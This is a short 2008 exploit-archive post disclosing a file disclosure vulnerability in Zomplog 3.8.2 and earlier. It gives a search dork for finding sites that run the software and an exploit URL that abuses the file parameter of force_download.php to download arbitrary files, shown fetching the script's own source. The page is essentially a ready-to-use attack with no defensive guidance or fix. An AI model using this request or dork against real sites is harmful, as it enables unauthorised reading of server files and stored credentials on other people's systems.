Zomplog <= 3.8.2 (force_download.php) File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Zomplog <= 3.8.2 (force_download.php) File Disclosure Vulnerability
# Published : 2008-05-16
# Author : Stack
# Previous Title : Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit
# Next Title : Kostenloses Linkmanagementscript SQL Injection Vulnerabilities

Name:  "Zomplog 3.8.2 <= file disclouse"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: Stack-Terrorist

Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
 
thnx : alah 

# www.Syue.com [2008-05-16]